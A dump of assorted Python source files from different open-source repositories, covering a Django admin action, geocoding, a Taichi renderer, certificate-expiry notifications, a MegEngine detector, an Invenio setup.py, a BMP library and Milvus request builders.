'action_checkbox_name': ACTION_CHECKBOX_NAME,
'opts': opts,
'app_label': app_label,
'module_name': module_name,
}
return TemplateResponse(request, 'admin/drop_schema.html',
context, current_app=self.admin_site.name)
drop_schema.short_description = "Remover Clientes e Dados selecionados"
class ClientAdmin(admin.ModelAdmin):
list_per_page = 15
list_display = ['name', 'institute']
ordering = ['name']
actions = [drop_schema, create_admin]
admin.site.register(Client, ClientAdmin)
| 4,685 |
src/moilutils/__init__.py
|
MoilOrg/MoilApp
| 0 |
2023218
|
from moilutils.moilutils import MoilUtils
from moilutils.videoController import VideoController
from moilutils.sourceIcon import ResourceIcon
| 141 |
xcparse/Xcode/XCSchemeActions/BuildableProductRunnable.py
|
samdmarshall/xcparser
| 59 |
2023563
|
class BuildableProductRunnable(object):
def __init__(self, entry_item):
self.contents = entry_item;
| 116 |
src/fetch_geocoordinates_data.py
|
davidrpugh/wealth-of-cities
| 0 |
2023622
|
import geopy
import pandas as pd
import fetch_bea_data
def get_geo_coords(data, geolocator):
"""
Return a Pandas DataFrame storing the latitude and longitude coords.
Parameters
----------
data : DataFrame
Pandas DataFrame containing GeoName and GeoFips columns.
geolocator : object
GeoPy geolocator object used to fetch the latitude and longitude
coordinates.
Returns
-------
df : DataFrame
Pandas DataFrame containing the latitude and longitude coordinates
indexed by GeoFips code.
"""
geo_coords = {}
for i, geo_name in enumerate(data['GeoName']):
try:
clean_geo_name = geo_name[:-32] # drop (Metropolitan Statistical Area)
tmp_idx = data.iloc[i]['GeoFips']
tmp_loc = geolocator.geocode(clean_geo_name)
geo_coords[i] = {'GeoFips': tmp_idx,
'lat': tmp_loc.latitude,
'lng': tmp_loc.longitude}
except AttributeError:
print("Can't find " + geo_name + "!")
df = pd.DataFrame.from_dict(geo_coords, orient='index')
return df
# load the place names from the BEA data
data = fetch_bea_data.dataframe[['GeoName', 'GeoFips']].drop_duplicates()
# define a geolocator
geolocator = geopy.geocoders.GoogleV3(timeout=10)
# grab and save the geo_coordinates data
geo_coords = get_geo_coords(data, geolocator)
geo_coords.to_csv('../data/google/geocoordinates.csv')
| 1,490 |
rubbish.bin/legacy/taichi_three/geometry.py
|
Jack12xl/taichi_three
| 0 |
2023667
|
import math
import taichi as ti
import taichi_glsl as ts
from .transform import *
from .camera import *
@ti.func
def plucker(a, b):
l0 = a[0] * b[1] - b[0] * a[1]
l1 = a[0] * b[2] - b[0] * a[2]
l2 = a[0] - b[0]
l3 = a[1] * b[2] - b[1] * a[2]
l4 = a[2] - b[2]
l5 = b[1] - a[1]
return l0, l1, l2, l3, l4, l5
@ti.func
def plucker_sideop(a, b):
res = a[0] * b[4] + a[1] * b[5] + a[2] * b[3] + a[3] * b[2] + a[4 ] * b[0] + a[5] * b[1]
return res
# https://members.loria.fr/SLazard/ARC-Visi3D/Pant-project/files/Line_Triangle.html
# https://www.cnblogs.com/flyuz/p/9471031.html
def plucker_bcoor(u, v, a, b, c):
ea = plucker(c, b)
eb = plucker(a, c)
ec = plucker(b, a)
L = plucker(u, v)
sa = plucker_sideop(L, ea)
sb = plucker_sideop(L, eb)
sc = plucker_sideop(L, ec)
return -sa, -sb, -sc
@ti.func
def intersect_triangle(model, orig, dir, face):
posa, posb, posc = face.pos
texa, texb, texc = face.tex
nrma, nrmb, nrmc = face.nrm
L2C = model.L2W[None]
posa = (L2C @ ts.vec4(posa, 1)).xyz
posb = (L2C @ ts.vec4(posb, 1)).xyz
posc = (L2C @ ts.vec4(posc, 1)).xyz
nrma = (L2C @ ts.vec4(nrma, 0)).xyz
nrmb = (L2C @ ts.vec4(nrmb, 0)).xyz
nrmc = (L2C @ ts.vec4(nrmc, 0)).xyz
tan, bitan = compute_tangent(posb - posa, posc - posa, texb - texa, texc - texa)
hit = 1e6
clr = ts.vec3(0.0)
sa, sb, sc = plucker_bcoor(orig, orig + dir, posa, posb, posc)
if (sa >= 0 and sb >= 0 and sc >= 0) or (sa <= 0 and sb <= 0 and sc <= 0):
snorm = sa + sb + sc
sa /= snorm
sb /= snorm
sc /= snorm
pos = posa * sa + posb * sb + posc * sc
tex = texa * sa + texb * sb + texc * sc
nrm = nrma * sa + nrmb * sb + nrmc * sc
if dir.dot(pos - orig) > 1e-4:
hit = (pos - orig).norm()
orig, dir, clr = model.material.radiance(model, pos, dir, tex, nrm, tan, bitan)
return hit, orig, dir, clr
# http://www.opengl-tutorial.org/cn/intermediate-tutorials/tutorial-13-normal-mapping/
@ti.func
def compute_tangent(dp1, dp2, duv1, duv2):
if ti.static(0):
return ts.vec3(0.0), ts.vec3(0.0)
IDUV = ti.Matrix([[duv1.x, duv1.y], [duv2.x, duv2.y]]).inverse()
DPx = ti.Vector([dp1.x, dp2.x])
DPy = ti.Vector([dp1.y, dp2.y])
DPz = ti.Vector([dp1.z, dp2.z])
T = ti.Vector([0.0, 0.0, 0.0])
B = ti.Vector([0.0, 0.0, 0.0])
T.x, B.x = IDUV @ DPx
T.y, B.y = IDUV @ DPy
T.z, B.z = IDUV @ DPz
return T, B
TAA_SHAKES = [(0, 0),
(1, 0), (0, -1), (-1, 0), (0, 1),
(1, 1), (-1, 1), (-1, -1), (1, -1),
]
@ti.func
def render_triangle(model, camera, face):
posa, posb, posc = face.pos # Position
texa, texb, texc = face.tex # TexCoord
nrma, nrmb, nrmc = face.nrm # Normal
pos_center = (posa + posb + posc) / 3
if ti.static(camera.type == camera.ORTHO):
pos_center = ts.vec3(0.0, 0.0, 1.0)
# NOTE: the normal computation indicates that a front-facing face should
# be COUNTER-CLOCKWISE, i.e., glFrontFace(GL_CCW);
# this is to be compatible with obj model loading.
if ts.dot(pos_center, ts.cross(posa - posc, posa - posb)) >= 0:
tan, bitan = compute_tangent(posb - posa, posc - posa, texb - texa, texc - texa) # TODO: node-ize this
clra = [posa, texa, nrma] # TODO: interpolate tan and bitan? merge with nrm?
clrb = [posb, texb, nrmb]
clrc = [posc, texc, nrmc]
A = camera.uncook(posa)
B = camera.uncook(posb)
C = camera.uncook(posc)
scr_norm = ts.cross(A - C, B - A)
if scr_norm != 0: # degenerate to 'line' if zero
B_A = (B - A) / scr_norm
A_C = (A - C) / scr_norm
shake = ts.vec2(0.0)
if ti.static(camera.fb.n_taa):
for i, s in ti.static(enumerate(map(ti.Vector, TAA_SHAKES[:camera.fb.n_taa]))):
if camera.fb.itaa[None] == i:
shake = s * 0.5
# screen space bounding box
M = int(ti.floor(min(A, B, C) - 1))
N = int(ti.ceil(max(A, B, C) + 1))
M = ts.clamp(M, 0, ti.Vector(camera.fb.res))
N = ts.clamp(N, 0, ti.Vector(camera.fb.res))
for X in ti.grouped(ti.ndrange((M.x, N.x), (M.y, N.y))):
# barycentric coordinates using the area method
X_A = X - A + shake
w_C = ts.cross(B_A, X_A)
w_B = ts.cross(A_C, X_A)
w_A = 1 - w_C - w_B
# draw
eps = ti.get_rel_eps() * 0.2
is_inside = w_A >= -eps and w_B >= -eps and w_C >= -eps
if not is_inside:
continue
# https://gitee.com/zxtree2006/tinyrenderer/blob/master/our_gl.cpp
if ti.static(camera.type != camera.ORTHO):
bclip = ts.vec3(w_A / posa.z, w_B / posb.z, w_C / posc.z)
bclip /= bclip.x + bclip.y + bclip.z
w_A, w_B, w_C = bclip
depth = (posa.z * w_A + posb.z * w_B + posc.z * w_C)
if camera.fb.atomic_depth(X, depth):
continue
posx, texx, nrmx = [a * w_A + b * w_B + c * w_C for a, b, c in zip(clra, clrb, clrc)]
color = ti.static(model.material.pixel_shader(model, posx, texx, nrmx, tan, bitan))
if ti.static(isinstance(color, dict)):
camera.fb.update(X, color)
else:
camera.fb.update(X, dict(img=color))
@ti.func
def render_line(model, camera, face, w0=0, w1=1):
posa, posb = face.pos # Position
texa, texb = face.tex # TexCoord
nrma, nrmb = face.nrm # Normal
clra = [posa, texa, nrma]
clrb = [posb, texb, nrmb]
A = camera.uncook(posa)
B = camera.uncook(posb)
M = int(ti.floor(min(A, B) - 1))
N = int(ti.ceil(max(A, B) + 1))
M = ts.clamp(M, 0, ti.Vector(camera.fb.res))
N = ts.clamp(N, 0, ti.Vector(camera.fb.res))
B_A = (B - A).normalized()
for X in ti.grouped(ti.ndrange((M.x, N.x), (M.y, N.y))):
udf = abs((X - A).cross(B_A))
if udf >= w1:
continue
strength = ts.smoothstep(udf, w1, w0)
color = ts.vec3(strength)
camera.img[X] += color
@ti.func
def render_particle(model, camera, index):
scene = model.scene
a = (model.L2C[None] @ ts.vec4(model.pos[index], 1)).xyz
r = model.radius[index]
A = camera.uncook(a)
rad = camera.uncook(ts.vec3(r, r, a.z), False)
M = int(ti.floor(A - rad))
N = int(ti.ceil(A + rad))
M = ts.clamp(M, 0, ti.Vector(camera.res))
N = ts.clamp(N, 0, ti.Vector(camera.res))
for X in ti.grouped(ti.ndrange((M.x, N.x), (M.y, N.y))):
pos = camera.cook(float(ts.vec3(X, a.z)))
dp = pos - a
dp2 = dp.norm_sqr()
if dp2 > r**2:
continue
dz = ti.sqrt(r**2 - dp2)
if camera.fb.atomic_depth(X, a.z - dz):
continue
n = ts.vec3(dp.xy, -dz)
normal = ts.normalize(n)
view = ts.normalize(a + n)
color = model.colorize(pos, normal)
camera.fb['img'][X] = color
camera.fb['normal'][X] = normal
| 7,289 |
natrixclient/command/http/httperror.py
|
creditease-natrix/natrixclient
| 9 |
2023449
|
# -*- coding: utf-8 -*-
class HttpError(object):
def __init__(self, url=None, timeout=None):
self.url = url
self.timeout = timeout
def connection_error(self):
data = {
"errorcode": 152,
"errorinfo": "Name or service not known {}".format(self.url)
}
result = {
"status": 1,
"data": data
}
return result
def connect_timeout(self):
data = {
"errorcode": 151,
"errorinfo": "Connection to {} timed out. (connect timeout={})".format(self.url, self.timeout)
}
result = {
"status": 1,
"data": data
}
return result
def read_timeout(self):
data = {
"errorcode": 153,
"errorinfo": "Read timed out. (read timeout={})".format(self.timeout)
}
result = {
"status": 1,
"data": data
}
return result
| 984 |
app/utils/notifications/event_type_expiration.py
|
BorysekOndrej/bakalarka3
| 1 |
2023372
|
import datetime
from typing import Dict, Tuple, Set, List
from loguru import logger
import app.db_models as db_models
from app.utils.notifications.connection_types import Notification, SlackNotification, MailNotification
from app.utils.notifications.event_types import EventType
from config import NotificationsConfig
class NotificationTypeExpiration(object):
def __init__(self, single_res, notification_preferences):
self.single_res = single_res
self.notification_preferences = notification_preferences
self.scan_order = single_res.ScanOrder
self.certificate_chain = single_res.LastScan.result.certificate_information.received_certificate_chain_list
self.days_remaining = (self.certificate_chain.not_after() - datetime.datetime.now()).days
self.event_type = EventType.ClosingExpiration if self.days_remaining >= 0 else EventType.AlreadyExpired
@staticmethod
def check_condition_and_create_notifications(main_data, notification_preferences_by_scan_order_id: Dict[str, dict])\
-> List[Notification]:
scan_order_ids_expired, scan_order_ids_nearing_expiration = NotificationTypeExpiration.check_condition(main_data, notification_preferences_by_scan_order_id)
notifications_to_send = NotificationTypeExpiration.create_notifications(main_data, notification_preferences_by_scan_order_id, scan_order_ids_expired, scan_order_ids_nearing_expiration)
return notifications_to_send
@staticmethod
def check_condition(main_data, notification_preferences_by_scan_order_id: Dict[str, dict])\
-> Tuple[Set, Set]:
expiration_by_target_id = {}
for single_res in main_data:
key = single_res.Target.id
val = single_res.ScanResults.certificate_information.received_certificate_chain_list.not_after()
expiration_by_target_id[key] = val
scan_order_ids_expired = set()
scan_order_ids_nearing_expiration = set()
for single_res in main_data:
scan_order_id = single_res.ScanOrder.id
target_id = single_res.ScanOrder.target_id
expires = expiration_by_target_id[target_id]
notification_settings = notification_preferences_by_scan_order_id[scan_order_id]
# todo: make filtering based on notification settings. Currently notifying about 1 day expire only
if expires < datetime.datetime.now():
scan_order_ids_expired.add(single_res.ScanOrder.id)
continue
if expires > datetime.datetime.now() + datetime.timedelta(
days=NotificationsConfig.start_sending_notifications_x_days_before_expiration):
continue
notifications_x_days_before_expiration \
= extract_and_parse_notifications_x_days_before_expiration(notification_settings)
certificate_chain = single_res.LastScan.result.certificate_information.received_certificate_chain_list
not_after = certificate_chain.not_after()
days_remaining = (not_after - datetime.datetime.now()).days
if days_remaining in notifications_x_days_before_expiration:
scan_order_ids_nearing_expiration.add(single_res.ScanOrder.id)
logger.info(f"scan_order_ids_expired orders ids: {scan_order_ids_expired}")
logger.info(f"scan_order_ids_nearing_expiration ids: {scan_order_ids_nearing_expiration}")
return scan_order_ids_expired, scan_order_ids_nearing_expiration
@staticmethod
def create_notifications(main_data, notification_preferences_by_scan_order_id: Dict[str, dict],
scan_order_ids_expired: Set, scan_order_ids_nearing_expiration: Set) -> List[Notification]:
notifications_to_send = []
for single_res in main_data:
scan_order_id = single_res.ScanOrder.id
if single_res.ScanOrder.id not in scan_order_ids_expired and \
single_res.ScanOrder.id not in scan_order_ids_nearing_expiration:
continue
final_pref = notification_preferences_by_scan_order_id[scan_order_id]
new_rec = NotificationTypeExpiration(single_res, final_pref)
notifications_to_send.extend(new_rec.craft_mails())
notifications_to_send.extend(new_rec.craft_slacks())
return notifications_to_send
def event_id_generator(self):
return f'{self.scan_order.id};{self.event_type};{self.certificate_chain.id};{self.days_remaining}'
def craft_mails(self) -> List[MailNotification]:
email_preferences = self.notification_preferences.get("email")
notifications_to_send = []
for single_mail_connection in email_preferences:
scan_order: db_models.ScanOrder = self.single_res.ScanOrder
target = scan_order.target
days_remaining = self.days_remaining
res = MailNotification()
res.event_id = self.event_id_generator()
res.recipient_email = single_mail_connection["email"]
if self.event_type.ClosingExpiration:
res.subject = f"Certificate expiration notification ({target}) - {days_remaining} days remaining"
else:
res.subject = f"Certificate expiration notification ({target}) - Expired days {days_remaining} ago"
# todo: use flask templating
res.text = res.subject # todo
notifications_to_send.append(res)
return notifications_to_send
def craft_plain_text(self):
# fallback when more specific function for channel is not available
# todo: actual plaintext
return self.event_id_generator()
def craft_slacks(self) -> List[SlackNotification]:
channel_preferences = self.notification_preferences.get("slack")
notifications_to_send = []
for single_slack_connection in channel_preferences:
res = SlackNotification()
res.event_id = self.event_id_generator()
res.connection_id = single_slack_connection["id"]
res.text = self.craft_plain_text()
notifications_to_send.append(res)
return notifications_to_send
def extract_and_parse_notifications_x_days_before_expiration(pref: dict) -> set:
notifications_x_days_before_expiration = set()
notifications_x_days_before_expiration_string =\
pref.get("notifications_x_days_before_expiration",
NotificationsConfig.default_pre_expiration_periods_in_days)
notifications_x_days_before_expiration_list_of_strings = notifications_x_days_before_expiration_string.split(",")
for x in notifications_x_days_before_expiration_list_of_strings:
if x:
notifications_x_days_before_expiration.add(int(x))
return notifications_x_days_before_expiration
| 6,884 |
model/emd_simple/network.py
|
niqbal996/CrowdDetection
| 252 |
2023022
|
import numpy as np
import megengine as mge
import megengine.functional as F
import megengine.module as M
from config import config
from backbone.resnet50 import ResNet50
from backbone.fpn import FPN
from module.rpn import RPN
from layers.roi_pool import roi_pool
from det_opr.bbox_opr import bbox_transform_inv_opr
from det_opr.fpn_roi_target import fpn_roi_target
from det_opr.loss_opr import softmax_loss, smooth_l1_loss
from det_opr.utils import get_padded_tensor
class Network(M.Module):
def __init__(self):
super().__init__()
# ----------------------- build the backbone ------------------------ #
self.resnet50 = ResNet50()
# ------------ freeze the weights of resnet stage1 and stage 2 ------ #
if config.backbone_freeze_at >= 1:
for p in self.resnet50.conv1.parameters():
p.requires_grad = False
if config.backbone_freeze_at >= 2:
for p in self.resnet50.layer1.parameters():
p.requires_grad = False
# -------------------------- build the FPN -------------------------- #
self.backbone = FPN(self.resnet50)
# -------------------------- build the RPN -------------------------- #
self.RPN = RPN(config.rpn_channel)
# ----------------------- build the RCNN head ----------------------- #
self.RCNN = RCNN()
# -------------------------- input Tensor --------------------------- #
self.inputs = {
"image": mge.tensor(
np.random.random([2, 3, 224, 224]).astype(np.float32), dtype="float32",
),
"im_info": mge.tensor(
np.random.random([2, 5]).astype(np.float32), dtype="float32",
),
"gt_boxes": mge.tensor(
np.random.random([2, 100, 5]).astype(np.float32), dtype="float32",
),
}
def forward(self, inputs):
images = inputs['image']
im_info = inputs['im_info']
gt_boxes = inputs['gt_boxes']
# process the images
normed_images = (
images - config.image_mean[None, :, None, None]
) / config.image_std[None, :, None, None]
normed_images = get_padded_tensor(normed_images, 64)
if self.training:
return self._forward_train(normed_images, im_info, gt_boxes)
else:
return self._forward_test(normed_images, im_info)
def _forward_train(self, image, im_info, gt_boxes):
loss_dict = {}
# stride: 64,32,16,8,4, p6->p2
fpn_fms = self.backbone(image)
rpn_rois, loss_dict_rpn = \
self.RPN(fpn_fms, im_info, gt_boxes)
rcnn_rois, rcnn_labels, rcnn_bbox_targets = fpn_roi_target(
rpn_rois, im_info, gt_boxes, top_k=2)
loss_dict_rcnn = self.RCNN(
fpn_fms, rcnn_rois, rcnn_labels, rcnn_bbox_targets)
loss_dict.update(loss_dict_rpn)
loss_dict.update(loss_dict_rcnn)
return loss_dict
def _forward_test(self, image, im_info):
fpn_fms = self.backbone(image)
rpn_rois = self.RPN(fpn_fms, im_info)
pred_bbox = self.RCNN(fpn_fms, rpn_rois)
pred_score = pred_bbox[:, -1][:, None]
pred_bbox = pred_bbox[:, :-1] / im_info[0, 2]
pred_bbox = F.concat((pred_bbox, pred_score), axis=1)
return pred_bbox
class RCNN(M.Module):
def __init__(self):
super().__init__()
# roi head
self.fc1 = M.Linear(256*7*7, 1024)
self.fc2 = M.Linear(1024, 1024)
for l in [self.fc1, self.fc2]:
M.init.msra_uniform_(l.weight, a=1)
M.init.fill_(l.bias, 0)
# box predictor
self.emd_pred_cls_0 = M.Linear(1024, config.num_classes)
self.emd_pred_delta_0 = M.Linear(1024, config.num_classes * 4)
self.emd_pred_cls_1 = M.Linear(1024, config.num_classes)
self.emd_pred_delta_1 = M.Linear(1024, config.num_classes * 4)
for l in [self.emd_pred_cls_0, self.emd_pred_cls_1]:
M.init.normal_(l.weight, std=0.01)
M.init.fill_(l.bias, 0)
for l in [self.emd_pred_delta_0, self.emd_pred_delta_1]:
M.init.normal_(l.weight, std=0.001)
M.init.fill_(l.bias, 0)
def forward(self, fpn_fms, rcnn_rois, labels=None, bbox_targets=None):
# stride: 64,32,16,8,4 -> 4, 8, 16, 32
fpn_fms = fpn_fms[1:][::-1]
stride = [4, 8, 16, 32]
pool_features, rcnn_rois, labels, bbox_targets = roi_pool(
fpn_fms, rcnn_rois, stride, (7, 7), 'roi_align',
labels, bbox_targets)
flatten_feature = F.flatten(pool_features, start_axis=1)
roi_feature = F.relu(self.fc1(flatten_feature))
roi_feature = F.relu(self.fc2(roi_feature))
pred_emd_pred_cls_0 = self.emd_pred_cls_0(roi_feature)
pred_emd_pred_delta_0 = self.emd_pred_delta_0(roi_feature)
pred_emd_pred_cls_1 = self.emd_pred_cls_1(roi_feature)
pred_emd_pred_delta_1 = self.emd_pred_delta_1(roi_feature)
if self.training:
loss0 = emd_loss(
pred_emd_pred_delta_0, pred_emd_pred_cls_0,
pred_emd_pred_delta_1, pred_emd_pred_cls_1,
bbox_targets, labels)
loss1 = emd_loss(
pred_emd_pred_delta_1, pred_emd_pred_cls_1,
pred_emd_pred_delta_0, pred_emd_pred_cls_0,
bbox_targets, labels)
loss = F.concat([loss0, loss1], axis=1)
indices = F.argmin(loss, axis=1)
loss_emd = F.indexing_one_hot(loss, indices, 1)
loss_emd = loss_emd.sum()/loss_emd.shapeof()[0]
loss_dict = {}
loss_dict['loss_rcnn_emd'] = loss_emd
return loss_dict
else:
pred_scores_0 = F.softmax(pred_emd_pred_cls_0)[:, 1:].reshape(-1, 1)
pred_scores_1 = F.softmax(pred_emd_pred_cls_1)[:, 1:].reshape(-1, 1)
pred_delta_0 = pred_emd_pred_delta_0[:, 4:].reshape(-1, 4)
pred_delta_1 = pred_emd_pred_delta_1[:, 4:].reshape(-1, 4)
target_shape = (rcnn_rois.shapeof()[0], config.num_classes - 1, 4)
base_rois = F.add_axis(rcnn_rois[:, 1:5], 1).broadcast(target_shape).reshape(-1, 4)
pred_bbox_0 = restore_bbox(base_rois, pred_delta_0, True)
pred_bbox_1 = restore_bbox(base_rois, pred_delta_1, True)
pred_bbox_0 = F.concat([pred_bbox_0, pred_scores_0], axis=1)
pred_bbox_1 = F.concat([pred_bbox_1, pred_scores_1], axis=1)
#[{head0, pre1, tag1}, {head1, pre1, tag1}, {head0, pre1, tag2}, ...]
pred_bbox = F.concat((pred_bbox_0, pred_bbox_1), axis=1).reshape(-1,5)
return pred_bbox
def emd_loss(p_b0, p_c0, p_b1, p_c1, targets, labels):
pred_box = F.concat([p_b0, p_b1], axis=1).reshape(-1, p_b0.shapeof()[-1])
pred_box = pred_box.reshape(-1, config.num_classes, 4)
pred_score = F.concat([p_c0, p_c1], axis=1).reshape(-1, p_c0.shapeof()[-1])
targets = targets.reshape(-1, 4)
labels = labels.reshape(-1).astype(np.int32)
fg_masks = F.greater(labels, 0)
non_ignore_masks = F.greater_equal(labels, 0)
# mulitple class to one
indexing_label = (labels * fg_masks).reshape(-1,1)
indexing_label = indexing_label.broadcast((labels.shapeof()[0], 4))
pred_box = F.indexing_one_hot(pred_box, indexing_label, 1)
# loss for regression
loss_box_reg = smooth_l1_loss(
pred_box,
targets,
config.rcnn_smooth_l1_beta)
# loss for classification
loss_cls = softmax_loss(pred_score, labels)
loss = loss_cls*non_ignore_masks + loss_box_reg * fg_masks
loss = loss.reshape(-1, 2).sum(axis=1)
return loss.reshape(-1, 1)
def restore_bbox(rois, deltas, unnormalize=True):
if unnormalize:
std_opr = mge.tensor(config.bbox_normalize_stds[None, :])
mean_opr = mge.tensor(config.bbox_normalize_means[None, :])
deltas = deltas * std_opr
deltas = deltas + mean_opr
pred_bbox = bbox_transform_inv_opr(rois, deltas)
return pred_bbox
| 8,148 |
setup.py
|
KonstantinaStoikou/invenio-access
| 0 |
2023112
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio module for common role based access control."""
import os
from setuptools import find_packages, setup
readme = open('README.rst').read()
history = open('CHANGES.rst').read()
tests_require = [
'SQLAlchemy-Continuum>=1.2.1',
'cachelib>=0.1',
'check-manifest>=0.25',
'coverage>=4.0',
'isort>=4.3.0',
'mock>=1.0.0',
'pydocstyle>=1.0.0',
'pytest-cov>=1.8.0',
'pytest-pep8>=1.0.6',
'pytest>=3.6.0',
'redis>=2.10.3'
]
extras_require = {
'docs': [
'Sphinx>=1.8.4,<3',
],
'mysql': [
'invenio-db[mysql]>=1.0.0',
],
'postgresql': [
'invenio-db[postgresql]>=1.0.0',
],
'sqlite': [
'invenio-db>=1.0.0',
],
'tests': tests_require,
}
extras_require['all'] = []
for name, reqs in extras_require.items():
if name in ('sqlite', 'mysql', 'postgresql'):
continue
extras_require['all'].extend(reqs)
setup_requires = [
'Babel>=1.3',
'pytest-runner>=2.6.2',
]
install_requires = [
'invenio-admin>=1.2.0',
'invenio-accounts>=1.2.1',
'invenio-base>=1.2.2',
'invenio-i18n>=1.2.0',
]
packages = find_packages()
# Get the version string. Cannot be done with import!
g = {}
with open(os.path.join('invenio_access', 'version.py'), 'rt') as fp:
exec(fp.read(), g)
version = g['__version__']
setup(
name='invenio-access',
version=version,
description=__doc__,
long_description=readme + '\n\n' + history,
keywords='invenio access',
license='MIT',
author='CERN',
author_email='<EMAIL>',
url='https://github.com/inveniosoftware/invenio-access',
packages=packages,
zip_safe=False,
include_package_data=True,
platforms='any',
entry_points={
'flask.commands': [
'access = invenio_access.cli:access',
],
'invenio_access.actions': [
'invenio_access.actions = '
'invenio_access.permissions:superuser_access',
],
'invenio_access.system_roles': [
'any_user = invenio_access.permissions:any_user',
'authenticated_user = '
'invenio_access.permissions:authenticated_user',
],
'invenio_admin.views': [
'invenio_access_action_users = '
'invenio_access.admin:action_users_adminview',
'invenio_access_action_roles = '
'invenio_access.admin:action_roles_adminview',
'invenio_access_action_system_roles = '
'invenio_access.admin:action_system_roles_adminview',
],
'invenio_base.api_apps': [
'invenio_access = invenio_access:InvenioAccess',
],
'invenio_base.apps': [
'invenio_access = invenio_access:InvenioAccess',
],
'invenio_db.alembic': [
'invenio_access = invenio_access:alembic',
],
'invenio_db.models': [
'invenio_access = invenio_access.models',
],
'invenio_i18n.translations': [
'messages = invenio_access',
],
},
extras_require=extras_require,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Development Status :: 5 - Production/Stable',
],
)
| 4,090 |
obmplib.py
|
omiddavoodi/obmplib
| 0 |
2023732
|
def read4bint(f, o):
ret = f[o+3]
ret *= 256
ret += f[o+2]
ret *= 256
ret += f[o+1]
ret *= 256
ret += f[o]
return ret
def read2bint(f, o):
ret = f[o+1]
ret *= 256
ret += f[o]
return ret
def loadBMP(filename):
f = open(filename, 'b+r')
bts = f.read()
f.close()
if (bts[0:2] != b'BM'):
return "Not a supported bitmap file"
bitmapfilesize = read4bint(bts, 0x2)
pixelarrayoffset = read4bint(bts, 0xa)
dibheadersize = read4bint(bts, 0xe)
bitmapwidth = read4bint(bts, 0x12)
bitmapheight = read4bint(bts, 0x16)
bitsperpixel = read2bint(bts, 0x1c)
rawdatasize = read4bint(bts, 0x22)
rowsize = ((bitsperpixel * bitmapwidth + 31) // 32) * 4
ret = []
for j in range(bitmapheight):
row = []
for i in range(bitmapwidth):
x = pixelarrayoffset + i * 3 + j * rowsize
row.append((bts[x + 2], bts[x + 1], bts[x]))
ret.append(row)
return bitmapwidth, bitmapheight, ret[::-1]
def intTo4byte(a):
ret = b''
ret += bytes([a % 256])
a //= 256
ret += bytes([a % 256])
a //= 256
ret += bytes([a % 256])
a //= 256
ret += bytes([a % 256])
return ret
def saveBMP(filename, w, h, pixels):
rowsize = ((24 * w + 31) // 32) * 4
bts = b'BM'
dibheader = b'\x28' + b'\x00' * 3
dibheader += intTo4byte(w)
dibheader += intTo4byte(h)
dibheader += b'\x01\x00\x18' + b'\x00' * 5
dibheader += intTo4byte(h * rowsize)
dibheader += intTo4byte(2835)
dibheader += intTo4byte(2835)
dibheader += intTo4byte(0)
dibheader += intTo4byte(0)
padding = rowsize - 3 * w
pixelarray = []
for a in range(h):
for b in pixels[h - a - 1]:
pixelarray.extend(b)
pixelarray.extend( [0 for i in range(padding)])
pixelarray = bytes(pixelarray)
bmpsize = len(pixelarray) + len(dibheader) + 14
bts += intTo4byte(bmpsize)
bts += intTo4byte(0)
bts += intTo4byte(54)
f = open(filename, 'b+w')
f.write(bts + dibheader + pixelarray)
f.close()
| 2,111 |
.workloads/duco-miner-xhash1/src/gendnpfnkey.py
|
lolenseu/Projects
| 5 |
2023400
|
import json
import random
#from xh1.json
xh1 = json.loads(open('src/xh1.json', 'r').read())
#src gen for data, fingerprint, and key
gen_data = '<KEY>'
gen_fp = '0123456789'
gen_key = '123456789'
#data, fingerprint, and key
gen_data_len = '00000000'
gen_fp_len = '00000000'
gen_key_len = '00000000'
#generating raw data, fingerprint, and key
def gendata():
gendata = ''.join(random.choice(gen_data) for i in range(len(gen_data_len)))
return gendata
def genfp():
genfp = ''.join(random.choice(gen_fp) for i in range(len(gen_fp_len)))
return genfp
class steaching():
def __init__(self):
self.banner = ''.join('-' for i in range(len(gen_fp_len)))
self.rawdata = ''.join(f'{gendata()}\n' for i in range(len(gen_data_len)))
self.rawfp = ''.join(f'|{genfp()}|\n' for i in range(len(gen_fp_len)))
self.rawkey = ''.join(random.choice(gen_key) for i in range(len(gen_key_len)))
steach = steaching()
rawdnfpnkey = f'data:\n{steach.rawdata}fingerprint:\n0{steach.banner}0\n{steach.rawfp}0{steach.banner}0\nkey:\n[{steach.rawkey}]\nkeylen: {len(gen_key_len)}'
#print(rawdnfpnkey) ##raw of data, fingerprint, and key
#generating xh1 data, fingerprint, and key
def gen_encode():
global xh1_ram
xh1_file = open('src/xhash.xh1', 'w')
xh1_file.write('0x')
xh1_ram = '0x'
countdata = len(rawdnfpnkey)
counter = 0
while counter < countdata:
procces = rawdnfpnkey[counter]
strap = xh1[procces]
xh1_file.write(strap)
xh1_ram = xh1_ram + strap
counter += 1
| 1,573 |
milvus/client/prepare.py
|
yamasite/pymilvus
| 0 |
2023029
|
import copy
import ujson
from ..grpc_gen import milvus_pb2 as grpc_types
from ..grpc_gen import status_pb2
class Prepare:
@classmethod
def table_name(cls, table_name):
return grpc_types.TableName(table_name=table_name)
@classmethod
def table_schema(cls, table_name, dimension, index_file_size, metric_type, param):
"""
:type param: dict
:param param: (Required)
`example param={'table_name': 'name',
'dimension': 16,
'index_file_size': 1024
'metric_type': MetricType.L2
}`
:return: ttypes.TableSchema object
"""
_param = grpc_types.TableSchema(status=status_pb2.Status(error_code=0, reason='Client'),
table_name=table_name,
dimension=dimension,
index_file_size=index_file_size,
metric_type=metric_type)
if param:
param_str = ujson.dumps(param)
_param.extra_params.add(key="params", value=param_str)
return _param
@classmethod
def insert_param(cls, table_name, vectors, partition_tag, ids=None, params=None, **kwargs):
if ids is None:
_param = grpc_types.InsertParam(table_name=table_name, partition_tag=partition_tag)
else:
_param = grpc_types.InsertParam(
table_name=table_name,
row_id_array=ids,
partition_tag=partition_tag)
for vector in vectors:
if isinstance(vector, bytes):
_param.row_record_array.add(binary_data=vector)
else:
_param.row_record_array.add(float_data=vector)
params = params or dict()
params_str = ujson.dumps(params)
_param.extra_params.add(key="params", value=params_str)
return _param
